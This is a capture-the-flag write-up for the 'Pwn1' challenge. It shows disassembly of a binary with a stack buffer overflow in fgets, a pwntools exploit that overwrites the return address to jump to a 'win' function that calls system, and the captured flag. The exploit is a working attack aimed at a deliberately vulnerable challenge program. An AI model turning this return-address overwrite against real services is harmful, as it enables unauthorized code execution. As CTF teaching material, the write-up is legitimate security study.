Pwn1 · 0x3EB

Description Link to heading

Welcome to the series of 3 pwn challenges!

nc challs.n00bzunit3d.xyz 35932

Attachement : pwn1

Solving Link to heading

We have to get the ASM of the program and getting the offset of the Buffer Overflow.

objdump -D pwn1

00000000004011fb <main>:
  4011fb:       f3 0f 1e fa             endbr64
  4011ff:       55                      push   %rbp
  401200:       48 89 e5                mov    %rsp,%rbp
  401203:       48 83 ec 40             sub    $0x40,%rsp
  401207:       b8 00 00 00 00          mov    $0x0,%eax
  40120c:       e8 85 ff ff ff          call   401196 <init>
  401211:       48 8d 05 ec 0d 00 00    lea    0xdec(%rip),%rax        # 402004 <_IO_stdin_used+0x4>
  401218:       48 89 c7                mov    %rax,%rdi
  40121b:       e8 50 fe ff ff          call   401070 <puts@plt>
  401220:       48 8b 15 49 2e 00 00    mov    0x2e49(%rip),%rdx        # 404070 <stdin@GLIBC_2.2.5>
  401227:       48 8d 45 c0             lea    -0x40(%rbp),%rax
  40122b:       be 50 00 00 00          mov    $0x50,%esi
  401230:       48 89 c7                mov    %rax,%rdi
  401233:       e8 58 fe ff ff          call   401090 <fgets@plt>
  401238:       48 8d 05 dc 0d 00 00    lea    0xddc(%rip),%rax        # 40201b <_IO_stdin_used+0x1b>
  40123f:       48 89 c7                mov    %rax,%rdi
  401242:       e8 39 fe ff ff          call   401080 <system@plt>
  401247:       90                      nop
  401248:       c9                      leave
  401249:       c3                      ret

000000000040124a <win>:
  40124a:       f3 0f 1e fa             endbr64
  40124e:       55                      push   %rbp
  40124f:       48 89 e5                mov    %rsp,%rbp
  401252:       57                      push   %rdi
  401253:       48 8d 05 d3 0d 00 00    lea    0xdd3(%rip),%rax        # 40202d <_IO_stdin_used+0x2d>
  40125a:       48 89 c7                mov    %rax,%rdi
  40125d:       e8 1e fe ff ff          call   401080 <system@plt>
  401262:       90                      nop
  401263:       5d                      pop    %rbp
  401264:       c3                      ret

We found the function win to call

#!/usr/bin/env python3
from pwn import *

exe = './pwn1'

elf = context.binary = ELF(exe)
context.terminal = ['alacritty', '-e', 'zsh', '-c']

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

gdbscript = '''

'''.format(**locals())


#### Exploit starts here ####

io = start()
offset = 72
payload = b'A' * offset + p64(elf.symbols['win'])
io.sendline(payload)
io.interactive()

Result Link to heading

n00bz{PWN_1_Cl34r3d_n0w_0nt0_PWN_2!!!}